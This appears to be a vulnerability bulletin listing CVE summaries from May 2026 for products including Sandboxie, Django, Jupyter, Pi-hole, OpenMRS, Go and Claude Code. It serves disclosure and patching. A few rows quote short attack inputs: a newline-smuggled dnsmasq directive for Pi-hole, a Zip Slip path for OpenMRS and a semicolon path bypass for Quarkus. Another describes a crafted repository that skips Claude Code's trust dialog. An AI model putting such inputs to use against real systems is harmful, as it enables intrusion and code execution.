| sandboxie-plus--Sandboxie | Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, a Time-of-Check-to-Time-of-Use (TOCTOU) race condition exists during addon installation. When a user installs an addon through the SandMan interface, UpdUtil.exe is spawned as SYSTEM by SbieSvc but stages files in the user-writable %TEMP%\sandboxie-updater directory. After UpdUtil verifies file hashes against the signed addon manifest, install.bat extracts files.cab and executes config.exe from its contents. Between hash verification and extraction, an unprivileged user can replace files.cab with a crafted cabinet containing a malicious executable, which is then run as SYSTEM. No UAC prompt is required. This issue has been fixed in version 1.17.3. | 2026-05-05 | not yet calculated | CVE-2026-34596 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-xjvp-63f2-v585 |
| ASUS--ASUS System Control Interface | An Out-of-bounds Read vulnerability in the IOCTL handler in ASUS System Control Interface allows a local user to cause a system crash (BSOD) via a read size that exceeds the buffer size. Refer to the 'Security Update for MyASUS' section of the ASUS Security Advisory for more information. | 2026-05-08 | not yet calculated | CVE-2026-3508 | https://www.asus.com/security-advisory |
| djangoproject--Django | An issue was discovered in Django 6.0 before 6.0.5 and 5.2 before 5.2.14. Response headers do not vary on cookies if a session is not modified, but `SESSION_SAVE_EVERY_REQUEST` is `True`. A remote attacker can steal a user's session after that user visits a cached public page. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Cantina for reporting this issue. | 2026-05-05 | not yet calculated | CVE-2026-35192 | Django security archive Django releases announcements Django security releases issued: 6.0.5 and 5.2.14 |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In versions 2.17.0 and earlier, a path traversal vulnerability in the REST API allows an authenticated user to escape the configured root_dir and access sibling directories whose names begin with the same prefix as the root_dir. For example, with a root_dir named "test", the API permits access to a sibling directory named "testtest" through a crafted request to the /api/contents endpoint using encoded path components. An attacker can read, write, and delete files in affected sibling directories. Multi-tenant deployments using predictable naming schemes are particularly at risk, as a user with a directory named "user1" could access directories for user10 through user19 and beyond. A user who can choose a single-character folder name could gain access to a significant number of sibling directories. Version 2.18.0 contains a fix. As a workaround, ensure folder names do not share a common prefix with any sibling directory. | 2026-05-05 | not yet calculated | CVE-2026-35397 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-5789-5fc7-67v3 |
| PHPOffice--PhpSpreadsheet | PhpSpreadsheet is a library for reading and writing spreadsheet files. In versions 1.30.3 and earlier, 2.0.0 through 2.1.15, 2.2.0 through 2.4.4, 3.3.0 through 3.10.4, and 4.0.0 through 5.6.0, the HTML Writer skips htmlspecialchars() output escaping when a cell uses a custom number format containing the @ text placeholder with additional literal text (e.g., @ "items"). The escaping is only applied when the formatted output strictly equals the original cell value. When the format code contains @ with quoted literal text, the formatter substitutes the raw cell value into the format string and returns early without invoking the escaping callback. An attacker who can control cell content in a spreadsheet processed by the HTML Writer can inject arbitrary HTML and JavaScript into the generated output. This issue has been fixed in versions 1.30.4, 2.1.16, 2.4.5, 3.10.5, and 5.7.0. | 2026-05-05 | not yet calculated | CVE-2026-35453 | https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-6wpp-88cp-7q68 |
| lxc--incus | Incus is an open source container and virtual machine manager. In versions prior to 7.0.0, the image import flow issues an outbound HEAD request to a user-supplied URL before validating the request against project restrictions such as restricted.images.servers. The imgPostURLInfo function constructs and sends a HEAD request directly from the attacker-supplied source URL to resolve image metadata, and this network interaction occurs before the flow reaches the point where the import would be rejected by policy. Although the actual image download is blocked by the project restriction, an authenticated user can coerce the daemon into making blind HEAD requests to arbitrary destinations. These requests include server metadata in custom headers (Incus-Server-Architectures, Incus-Server-Version), which discloses information about the host environment to the attacker-controlled endpoint. This blind SSRF primitive can be used to probe internal services, unroutable address space, or cloud metadata endpoints reachable from the host. This vulnerability pattern is similar to CVE-2026-24767. This issue has been fixed in version 7.0.0. | 2026-05-05 | not yet calculated | CVE-2026-35527 | https://github.com/lxc/incus/security/advisories/GHSA-8gw4-p4wq-4hcv https://github.com/lxc/incus/blob/v6.22.0/cmd/incusd/images.go |
| coredns--coredns | CoreDNS is a DNS server written in Go. In versions prior to 1.14.3, the gRPC, QUIC, DoH, and DoH3 transport implementations incorrectly handle TSIG authentication. For gRPC and QUIC, the server checks whether the TSIG key name exists in the configuration but never calls dns.TsigVerify() to validate the HMAC. If the key name matches a configured key, the tsigStatus field remains nil and the tsig plugin treats the request as successfully authenticated regardless of the MAC value. For DoH and DoH3, the issue is more severe: the DoHWriter.TsigStatus() method unconditionally returns nil, and the server never inspects the TSIG record at all. Any request containing a TSIG record is treated as authenticated over DoH and DoH3, even if the key name is invalid and the MAC is arbitrary. An unauthenticated network attacker can exploit this to bypass TSIG-protected functionality such as AXFR/IXFR zone transfers, dynamic DNS updates, or other TSIG-gated plugin behavior. The DoH and DoH3 variants have a lower exploitation bar because the attacker does not need to know a valid TSIG key name. This issue has been fixed in version 1.14.3. As a workaround, disable gRPC, QUIC, DoH, and DoH3 listeners where TSIG authentication is required, or restrict network-level access to affected transport ports to trusted sources only. | 2026-05-05 | not yet calculated | CVE-2026-35579 | https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9 |
| n/a--Webkul Krayin CRM v2.1.5 | Cross-Site Scripting (XSS) vulnerability exists in Webkul Krayin CRM v2.1.5. The application fails to sanitize user-supplied input in the comment field during Activity creation on the /admin/activities/create endpoint. | 2026-05-07 | not yet calculated | CVE-2026-36341 | https://github.com/krayin/laravel-crm/releases/tag/v2.1.6 https://github.com/krayin/laravel-crm/pull/2401 https://drive.google.com/file/d/1Y_WjD4Tiq_z7zQUlddFCFMDoyyN300r9/view https://cyber.spool.co.jp/vulnerabilities/cve-2026-36341/ https://github.com/cybercrewinc/CVE-2026-36341 |
| www[.]Realtek[.]com--Realtek rtl819x Jungle SDK | The rtl8192cd Wi-Fi kernel driver in the Realtek rtl819x Jungle SDK (all known versions through v3.4.14B) does not perform any access control checks on the write_mem (ioctl 0x89F5) and read_mem (ioctl 0x89F6) debug handlers, which are compiled into production builds via the unconditionally defined _IOCTL_DEBUG_CMD_ macro in 8192cd_cfg.h. | 2026-05-05 | not yet calculated | CVE-2026-36355 | http://realtek.com https://github.com/totekuh/CVE-2026-36355 |
| https://en[.]meigsmart[.]com-- MeiG Smart FORGE_SLT711 devices | The GoAhead web server on MeiG Smart FORGE_SLT711 devices (firmware MDM9607.LE.1.0-00110-STD.PROD-1) allows unauthenticated OS command injection via the /action/SetRemoteAccessCfg endpoint. | 2026-05-05 | not yet calculated | CVE-2026-36356 | http://forgeslt711.com http://meig.com https://github.com/totekuh/CVE-2026-36356 |
| n/a--Juzaweb CMS v.5.0.0 | Cross Site Scripting vulnerability in Juzaweb CMS v.5.0.0 allows a remote attacker to execute arbitrary code via a crafted script submitted to the Add Banner Ads function. | 2026-05-06 | not yet calculated | CVE-2026-36358 | https://juzaweb.com/ http://juzaweb.com https://gist.github.com/yuhuamiao/2c984b2d7f2adb90020818f9308b5862 |
| n/a--Lymphatus caesium-image-compressor | An issue in Lymphatus caesium-image-compressor, all versions up to and including commit 02da2c6, allows a local attacker to execute arbitrary code via the shutdownMachine and putMachineToSleep functions in PostCompressionActions.cpp. | 2026-05-04 | not yet calculated | CVE-2026-36365 | https://github.com/Lymphatus/caesium-image-compressor https://github.com/Lymphatus/caesium-image-compressor/blob/main/src/utils/PostCompressionActions.cpp https://github.com/Lymphatus/caesium-image-compressor/pull/376 https://github.com/mertsatilmaz/vulnerability-research/blob/main/advisories/CVE-2026-36365.md |
| codeastro[.]com-- CODEASTRO MMS v1.0 | A Remote Code Execution vulnerability was found in CODEASTRO Membership Management System v1.0 in /add_members.php. This vulnerability affects the file upload functionality, where improper file sanitization allows attackers to upload malicious files, which leads to RCE. | 2026-05-07 | not yet calculated | CVE-2026-36387 | http://codeastro.com https://github.com/raneishajustin/CVE/tree/main/CVE-2026-36387 |
| n/a--PHPGurukal Hospital Management System v4.0 | A Cross-Site Scripting (XSS) vulnerability was found in PHPGurukal Hospital Management System v4.0 in the /hospital/hms/edit-profile.php page. This flaw allows an authenticated attacker (patient) to inject a malicious script payload into the User Name parameter, which is stored in the application and later rendered in the doctor's interface. | 2026-05-07 | not yet calculated | CVE-2026-36388 | http://phpgurukal.com https://github.com/raneishajustin/CVE/tree/main/CVE-2026-36388 |
| n/a--ChestnutCMS v1.5.10 | ChestnutCMS v1.5.10 has a SQL injection vulnerability. The content parameter of the cms_content tag can be manipulated in the admin backend and injected into a SQL query when the template is rendered. | 2026-05-07 | not yet calculated | CVE-2026-36458 | https://github.com/liweiyi/ChestnutCMS.git https://github.com/errors11/CVE/blob/main/CVE-2026-36458.md |
| n/a--Beauty Parlour Management System v1.1 | Beauty Parlour Management System v1.1 was discovered to contain a SQL injection vulnerability via the aptnumber parameter in the /appointment-detail.php endpoint. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement. | 2026-05-08 | not yet calculated | CVE-2026-37431 | https://github.com/Y4y17/CVE/blob/main/Beauty%20Parlour%20Management%20System/SQL%20Injection-2.md |
| n/a--FRRouting (FRR) | Missing input validation in the MP_REACH_NLRI component of FRRouting (FRR) stable/10.0 to stable/10.6 allows authenticated attackers to cause a Denial of Service (DoS) via supplying a crafted UPDATE message. | 2026-05-04 | not yet calculated | CVE-2026-37458 | https://github.com/FRRouting/frr/commit/8102a8aeceb9f86fdfe1f80cd77080522bab69c8 https://github.com/mertsatilmaz/vulnerability-research/blob/main/advisories/CVE-2026-36365.md |
| n/a--FRRouting (FRR) | An integer underflow in FRRouting (FRR) stable/10.0 to stable/10.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-05-04 | not yet calculated | CVE-2026-37459 | https://github.com/FRRouting/frr/commit/693a2e02687cdc9d16501275e05136edea9650d9 |
| n/a--ParseIP6Extended | An out-of-bounds read in the ParseIP6Extended function (/bgp/bgp.go) of gobgp v4.3.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted BGP UPDATE message. | 2026-05-04 | not yet calculated | CVE-2026-37461 | https://github.com/osrg/gobgp/blob/v4.3.0/pkg/packet/bgp/bgp.go https://github.com/osrg/gobgp/commit/362cce3e325f56e7a4f792ccb9689b3bdda9e682 https://github.com/osrg/gobgp/commit/9ce8936672ebc07df524da77fa4c6ae26d92be6d |
| grok[.]com-- grokability snipe-it v.8.4.0 | Insecure Permissions vulnerability in grokability snipe-it v.8.4.0 and before (fixed after the 2026-03-10 commit 676a9958) allows a remote attacker to execute arbitrary code via the app/Http/Controllers/Api/UploadedFilesController.php component. | 2026-05-07 | not yet calculated | CVE-2026-37709 | https://github.com/grokability/snipe-it/commit/676a9958895a77de340565e7a0b17ae744664904 https://github.com/grokability/snipe-it/security/advisories/GHSA-xg82-2hrv-hf64 |
| n/a--fohrloop dash-uploader v.0.1.0 | Directory Traversal vulnerability in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, BaseHttpRequestHandler.get_temp_root(), and BaseHttpRequestHandler._post() components. | 2026-05-08 | not yet calculated | CVE-2026-38360 | https://github.com/fohrloop/dash-uploader https://pypi.org/project/dash-uploader/ https://github.com/fohrloop/dash-uploader/blob/stable/dash_uploader/httprequesthandler.py https://github.com/fohrloop/dash-uploader/blob/dev/dash_uploader/httprequesthandler.py https://github.com/fohrloop/dash-uploader/issues/153 https://github.com/a1ohadance/CVE-2026-38360 |
| n/a--fohrloop dash-uploader v.0.1.0 | An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py (in the Upload function and the max_file_size parameter), and dash_uploader/configure_upload.py components. | 2026-05-08 | not yet calculated | CVE-2026-38361 | https://github.com/fohrloop/dash-uploader https://pypi.org/project/dash-uploader/ https://github.com/fohrloop/dash-uploader/blob/stable/dash_uploader/httprequesthandler.py https://github.com/fohrloop/dash-uploader/issues/153 https://pypistats.org/packages/dash-uploader https://libraries.io/pypi/dash-uploader https://pepy.tech/project/dash-uploader https://docs.python.org/3/library/functions.html#all https://github.com/a1ohadance/CVE-2026-38361 |
| n/a--Kestra v1.3.3 | Kestra v1.3.3 and before is vulnerable to SQL Injection. The vulnerability occurs because user-controlled input from a GET parameter is directly concatenated into an SQL query without proper sanitization or parameterization. As a result, attackers can inject arbitrary SQL expressions into the database query. | 2026-05-05 | not yet calculated | CVE-2026-38428 | https://www.link.com https://github.com/kestra-io/kestra/security/advisories/GHSA-365w-2m69-mp9x |
| n/a--OpenCMS v20 | OpenCMS v20 and before is vulnerable to XML External Entity (XXE) in the Admin Import DB feature due to insecure XML parsing of user supplied .zip files containing a manifest.xml. | 2026-05-05 | not yet calculated | CVE-2026-38429 | https://github.com/alkacon/opencms-core/commit/e3e41e5a96d71383279e7d23c627efc9934008c1 |
| n/a--ERPNext v15.103.1 | ERPNext v15.103.1 and before is vulnerable to Server-Side Template Injection (SSTI). An attacker with permission to create or edit email templates can inject template expressions that are executed on the server when the template is rendered. | 2026-05-05 | not yet calculated | CVE-2026-38431 | https://c0wking.hashnode.dev/ssti-in-erpnext-frappe-email-template-engine |
| n/a--ERPNext v15.103.1 | ERPNext v15.103.1 and before is vulnerable to Cross Site Scripting (XSS) in the Email Template engine. An attacker with permission to create or edit email templates can inject malicious JavaScript code that is executed in the victim's browser when the template is applied. | 2026-05-05 | not yet calculated | CVE-2026-38432 | https://c0wking.hashnode.dev/stored-xss-in-erpnext-frappe-email-template-engine |
| n/a--wCMS v.1.4 | wCMS v.1.4 is vulnerable to Cross Site Scripting (XSS) when creating a new blog. | 2026-05-04 | not yet calculated | CVE-2026-38669 | https://github.com/thv930/yumeng_wu/tree/main/1/readme.md |
| n/a--OpenSTAManager version 2.10 | OpenSTAManager version 2.10 and earlier contains an arbitrary file upload vulnerability in the module update functionality (modules/aggiornamenti/upload_modules.php). | 2026-05-04 | not yet calculated | CVE-2026-38751 | https://github.com/devcode-it/openstamanager https://github.com/fuutianyii/poc |
| n/a--FluentCMS 1.2.3 | FluentCMS 1.2.3 is vulnerable to Cross Site Scripting (XSS) in TextHTML plugin. | 2026-05-05 | not yet calculated | CVE-2026-38947 | https://github.com/fluentcms/FluentCMS/issues/2405 |
| n/a--GPAC | Buffer Overflow vulnerability in GPAC before commit v391dc7f4d234988ea0bc3cc294eb725eddf8f702 allows an attacker to cause a denial of service via src/scenegraph/svg_attributes.c, svg_parse_strings(), and gf_svg_parse_attribute(). | 2026-05-05 | not yet calculated | CVE-2026-39103 | https://github.com/gpac/gpac/issues/3506 https://github.com/gpac/gpac/commit/391dc7f4d234988ea0bc3cc294eb725eddf8f702 |
| gotenberg--gotenberg | Gotenberg is an API-based document conversion tool. In version 8.29.1, an unauthenticated attacker with network access can force the server to make outbound HTTP POST requests to arbitrary internal or external destinations by supplying a crafted URL in the Gotenberg-Webhook-Url request header. The FilterDeadline function in filter.go is intended to gate outbound URLs, but when both the allow-list and deny-list are empty (the default configuration), it returns nil unconditionally and permits any URL. This is a blind SSRF: Gotenberg POSTs the converted document to the webhook URL and only checks whether the response status code is an error, but never returns the target's response body to the attacker. An attacker can use this to probe internal network infrastructure by observing whether the error callback is invoked, force POST requests against internal services that perform side effects, and confirm reachability of cloud metadata endpoints. The retryable HTTP client issues up to 4 automatic retries per request, amplifying each probe. This issue has been fixed in version 8.31.0. As a workaround, configure the GOTENBERG_API_WEBHOOK_ALLOW_LIST environment variable to restrict webhook URLs to known receivers, or set GOTENBERG_API_WEBHOOK_DENY_LIST to block RFC-1918 and link-local address ranges. | 2026-05-05 | not yet calculated | CVE-2026-39383 | https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5vh4-rgv7-p9g4 |
| lxc--lxc | lxc is a Linux container runtime. In the setuid helper lxc-user-nic, the delete path contains a logic flaw in the find_line() function that allows an unprivileged user to delete OVS-attached network interfaces belonging to other users. When lxc-user-nic delete scans its NIC database to authorize a deletion request, the interface name comparison can set the authorization flag based on a name match alone, even when the ownership, type, and link fields in that database entry belong to a different user. The vulnerable check sits after the goto next label handling, meaning it is reachable on lines where earlier ownership checks failed or were skipped. Because nothing downstream of this authorization signal re-verifies that the matched database line actually belongs to the caller, an unprivileged attacker with a valid lxc-usernet policy entry can trigger deletion of another user's OVS port on the same bridge. This is limited to multi-tenant environments using lxc-user-nic with OpenVSwitch bridges. The impact is denial of service - one tenant can repeatedly disconnect networking from containers run by another tenant on shared infrastructure. This is patched in version 7.0.0. | 2026-05-05 | not yet calculated | CVE-2026-39402 | https://github.com/lxc/lxc/security/advisories/GHSA-3m9j-g9gc-vcvq |
| Apache Software Foundation--Apache NiFi | The optional extension component TinkerpopClientService is missing the Restricted annotation with the Execute Code Required Permission in Apache NiFi 2.0.0-M1 through 2.8.0. The TinkerpopClientService supports configuration of ByteCode Submission for the Script Submission Type, enabling Groovy Script execution in the service prior to submitting the query. The missing Restricted annotation allows users without the Execute Code Permission to configure the Service in installations that use fine-grained authorization and have the optional TinkerpopClientService installed. Apache NiFi installations that do not have the nifi-other-graph-services-nar installed are not subject to this vulnerability. Upgrading to Apache NiFi 2.9.0 is the recommended mitigation. | 2026-05-08 | not yet calculated | CVE-2026-39816 | https://lists.apache.org/thread/gh9g7xwvv4l20gzff6q3367snf35ctcb |
| Go toolchain--cmd/go | The "go tool pack" subcommand (usually used only by the compiler as an internal tool with known-good inputs) does not sanitize output filenames. Extracting a malicious archive file with the "pack" subcommand can write files to arbitrary locations on the filesystem. | 2026-05-07 | not yet calculated | CVE-2026-39817 | https://go.dev/issue/78778 https://go.dev/cl/767520 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4979 |
| Go toolchain--cmd/go | The "go bug" command writes to two files with predictable names in the system temporary directory (for example, "/tmp"). An attacker with access to the temporary directory can create a symlink in one of these names, causing "go bug" to overwrite the target of the symlink. | 2026-05-07 | not yet calculated | CVE-2026-39819 | https://go.dev/issue/78584 https://go.dev/cl/763882 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4978 |
| Go standard library--net/mail | Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU exhaustion and memory allocations. | 2026-05-07 | not yet calculated | CVE-2026-39820 | https://go.dev/issue/78566 https://go.dev/cl/759940 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4986 |
| Go standard library--html/template | CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a <meta> tag's <content> attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the <content> attribute, the escaper would fail to similarly escape it, leading to XSS. | 2026-05-07 | not yet calculated | CVE-2026-39823 | https://go.dev/issue/78913 https://go.dev/cl/769920 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4982 |
| Go standard library--net/http/httputil | ReverseProxy can forward queries containing parameters not visible to Rewrite functions. When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function. For example, the query "a1=x&a2=x&...&a10000=x&hidden=y" can forward the parameter "hidden=y" while hiding it from the proxy's Rewrite function. | 2026-05-07 | not yet calculated | CVE-2026-39825 | https://go.dev/cl/770541 https://go.dev/issue/78948 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4976 |
| Go standard library--html/template | If a trusted template author were to write a <script> tag containing an empty 'type' attribute or a 'type' attribute with an ASCII whitespace, the execution of the template would incorrectly escape any data passed into the <script> block. | 2026-05-07 | not yet calculated | CVE-2026-39826 | https://go.dev/issue/78981 https://go.dev/cl/771180 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4980 |
| Go standard library--net | The Dial and LookupPort functions panic on Windows when provided with an input containing a NUL (0). | 2026-05-07 | not yet calculated | CVE-2026-39836 | https://go.dev/issue/79006 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://go.dev/cl/775320 https://pkg.go.dev/vuln/GO-2026-4971 |
| pi-hole--FTL | Pi-hole FTL is the core engine of the Pi-hole network-level advertisement and tracker blocker. In versions before 6.6.1, the `dns.interface` configuration field in Pi-hole FTL accepted newline characters without validation, allowing an attacker to inject arbitrary directives into the generated dnsmasq configuration file. On installations with no admin password set (the default for many deployments), the configuration API is fully accessible without credentials, allowing a network-adjacent attacker to inject the payload, enable the built-in DHCP server, and achieve arbitrary command execution on the host the next time any device on the network requests a DHCP lease. The injected value is persisted to /etc/pihole/pihole.toml and survives restarts. The strncpy in the code path limits the total interface field to 31 bytes, but payloads such as wlan0\ndhcp-script=/tmp/p fit within this constraint. The dnsmasq config validation introduced in FTL 6.6 only checks syntactic validity, so valid directives injected via newline pass validation successfully. This issue has been fixed in version 6.6.1. | 2026-05-05 | not yet calculated | CVE-2026-39849 | https://github.com/pi-hole/FTL/security/advisories/GHSA-9cqv-839p-gpq2 https://github.com/pi-hole/FTL/commit/0c46e4ec7fe57f762fce261625f2cf5d43806e6d https://github.com/pi-hole/FTL/releases/tag/v6.6.1 |
| quarkusio--quarkus | Quarkus is a Java framework for building cloud-native applications. In versions prior to 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2, a path normalization inconsistency between the security layer and the routing layer allows unauthenticated or lower-privileged users to bypass HTTP path-based authorization policies. Quarkus's security layer performs authorization checks on the raw URL path which preserves matrix parameters (semicolons), while RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. An attacker can append a semicolon and arbitrary text to a request URL (e.g., /api/admin;anything) to bypass policies protecting /api/admin while still routing to the protected endpoint. This issue has been fixed in versions 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2. | 2026-05-05 | not yet calculated | CVE-2026-39852 | https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9 |
| Apache Software Foundation--Apache Wicket | Missing invocation of Servlet http web request method changeSessionId after session binding can be exploited for a session fixation attack in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-40010 | https://lists.apache.org/thread/61wsc0xdtfd5oozojfx7by9w3jwgkmv1 |
| anthropics--claude-code | In versions 2.1.63 through 2.1.83 of Claude Code, the folder trust determination logic used the git worktree commondir file without validating its contents. An attacker could craft a malicious repository with a commondir file pointing to a path the victim had previously trusted, causing Claude Code to bypass its trust confirmation dialog and immediately execute hooks defined in `.claude/settings.json`. Exploitation requires the victim to clone the malicious repository and run Claude Code within it, and the attacker must know or guess a path the victim had already trusted. This issue has been fixed in version 2.1.84. | 2026-05-05 | not yet calculated | CVE-2026-40068 | https://github.com/anthropics/claude-code/security/advisories/GHSA-q5hj-mxqh-vv77 |
| openmrs--openmrs-core | OpenMRS Core is an open source electronic medical record system platform. In versions 2.7.8 and earlier and versions 2.8.0 through 2.8.5, the `/openmrs/moduleResources/{moduleid}` endpoint is vulnerable to a path traversal attack. The ModuleResourcesServlet constructs a filesystem path from user-controlled input without performing path boundary validation - the getFile() method concatenates the user-supplied path into an absolute filesystem path without calling normalize() or checking that the result stays within the allowed module resources directory. Because this endpoint serves static resources required for rendering the login page, it is not protected by authentication filters, allowing unauthenticated exploitation. An attacker can traverse directories and read arbitrary files from the server filesystem, including /etc/passwd and application configuration files containing database credentials. Successful exploitation requires the target deployment to run on Apache Tomcat versions prior to 8.5.31, where the ..; path parameter bypass is not mitigated by the container. Deployments on Tomcat 8.5.31 or later and Tomcat 9.0.10 or later are protected at the container level, though the underlying code defect remains. This issue has been fixed in versions after 2.7.8 (within the 2.7.x branch) and in version 2.8.6 and later. | 2026-05-05 | not yet calculated | CVE-2026-40075 | https://github.com/openmrs/openmrs-core/security/advisories/GHSA-jjgj-cx3q-pw4w |
| openmrs--openmrs-core | OpenMRS Core is an open source electronic medical record system platform. In versions 2.7.8 and earlier and versions 2.8.0 through 2.8.5, the module upload endpoint at POST `/openmrs/ws/rest/v1/module` is vulnerable to a Zip Slip path traversal attack. During automatic extraction of uploaded .omod archives in `WebModuleUtil.startModule()`, ZIP entries under web/module/ are checked only to see whether the full entry path starts with `..`, and the remaining path is then concatenated into the destination path without normalization or a boundary check. A crafted archive can therefore include entries such as `web/module/../../../../malicious.jsp` and cause files to be written outside the intended module directory. An authenticated attacker with module upload access can write arbitrary files to locations such as the web application root and achieve remote code execution by uploading a JSP file and then requesting it. The issue is compounded by the fact that the module.allow_web_admin runtime property is enforced in the legacy UI controller but not in the REST API upload path, so deployments relying on that property to block web-based module administration remain exposed through the REST endpoint. This issue has been fixed in versions after 2.7.8 in the 2.7.x line and in version 2.8.6 and later. | 2026-05-06 | not yet calculated | CVE-2026-40076 | https://github.com/openmrs/openmrs-core/security/advisories/GHSA-78fc-9688-w8xw |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In versions 2.17.0 and earlier, the Origin header validation uses Python's re.match() to check incoming origins against the allow_origin_pat configuration value. Because re.match() only anchors at the start of the string and does not require a full match, a pattern intended to match only a trusted domain (e.g., trusted.example.com) will also match any origin that begins with that domain followed by additional characters (e.g., trusted.example.com.evil.com). An attacker who controls such a domain can bypass the CORS origin restriction and make cross-origin requests to the Jupyter Server API from an untrusted site. This issue has been fixed in version 2.18.0. | 2026-05-05 | not yet calculated | CVE-2026-40110 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-24qx-w28j-9m6p https://github.com/jupyter-server/jupyter_server/pull/603 https://github.com/jupyter-server/jupyter_server/commit/057869a327c46730afede3eab0ca2d2e3e74acea https://github.com/jupyter-server/jupyter_server/commit/49b34392feaa97735b3b777e3baf8f22f2a14ed8 |
| jupyter--notebook | In Jupyter Notebook versions 7.0.0 through 7.5.5, JupyterLab versions 4.5.6 and earlier, and the corresponding @jupyter-notebook/help-extension and @jupyterlab/help-extension packages before 7.5.6 and 4.5.7, a stored cross-site scripting issue in the help command linker can be chained with attacker-controlled notebook content to steal authentication tokens with a single click. An attacker can craft a malicious notebook file containing elements that appear indistinguishable from legitimate controls and trigger execution when a user interacts with them. Successful exploitation allows theft of the user's authentication token and complete takeover of the Jupyter session through the REST API, including reading files, creating or modifying files, accessing kernels to execute arbitrary code, and creating terminals for shell access. This issue has been fixed in Notebook 7.5.6, JupyterLab 4.5.7, @jupyter-notebook/help-extension 7.5.6, and @jupyterlab/help-extension 4.5.7. As a workaround, disable the affected help extensions or set allowCommandLinker to false in the sanitizer configuration. | 2026-05-06 | not yet calculated | CVE-2026-40171 | https://github.com/jupyter/notebook/security/advisories/GHSA-rch3-82jr-f9w9 |
| MasaCMS--MasaCMS | Masa CMS is a content management system forked from Mura CMS. In versions 7.5.2 and earlier, the cUsers.updateAddress function does not properly validate anti-CSRF tokens for user address management operations. An attacker can induce a logged-in administrator to submit a forged request that adds, modifies, or deletes user address records, including email addresses and phone numbers. This can be used to alter contact information, redirect organizational communications, and corrupt address data in the user directory. This issue has been fixed in versions 7.2.10, 7.3.15, 7.4.10, and 7.5.3. As a workaround, restrict access to the administrative backend, use browser isolation for administrative sessions, or deploy filtering rules to block forged requests to the affected endpoint. | 2026-05-06 | not yet calculated | CVE-2026-40174 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-572m-p246-4356 |
| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage bucket import logic allows an authenticated user with access to the storage bucket feature to cause the Incus daemon to crash. The vulnerability is present in the backup metadata handling logic, where the daemon processes the index.yaml file from an imported archive and accesses members of the parsed backup configuration without first verifying that the configuration object was initialized. A malicious or malformed index.yaml that omits the config block causes a nil-pointer dereference during bucket import operations and terminates the daemon. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40195 | https://github.com/lxc/incus/security/advisories/GHSA-gc7j-g665-rxr9 |
| lxc--incus | Incus is a system container and virtual machine manager. In versions before 7.0.0, missing validation logic in the storage volume import logic allows an authenticated user with access to the storage volume feature to cause the Incus daemon to crash. The custom volume backup import subsystem contains a nil-pointer dereference vulnerability during import operations. In the snapshot import loop, the daemon iterates over entries from `srcBackup.Config.VolumeSnapshots` and assumes that each slice element is initialized, then dereferences fields such as `Name`, `Config`, `Description`, `CreatedAt`, and `ExpiresAt` without first validating the element itself. Because the yaml unmarshaler accepts explicit null array elements from an attacker-controlled index.yaml and converts them into nil pointers inside the slice, an attacker can supply a backup archive containing a null entry in the volume_snapshots array. This causes a nil-pointer dereference during custom volume import and terminates the daemon, resulting in denial of service on the affected node. Repeated use of this issue can be used to keep Incus offline, causing a denial of service. This issue is fixed in version 7.0.0. | 2026-05-06 | not yet calculated | CVE-2026-40197 | https://github.com/lxc/incus/security/advisories/GHSA-r7w7-mmxr-47r9 |
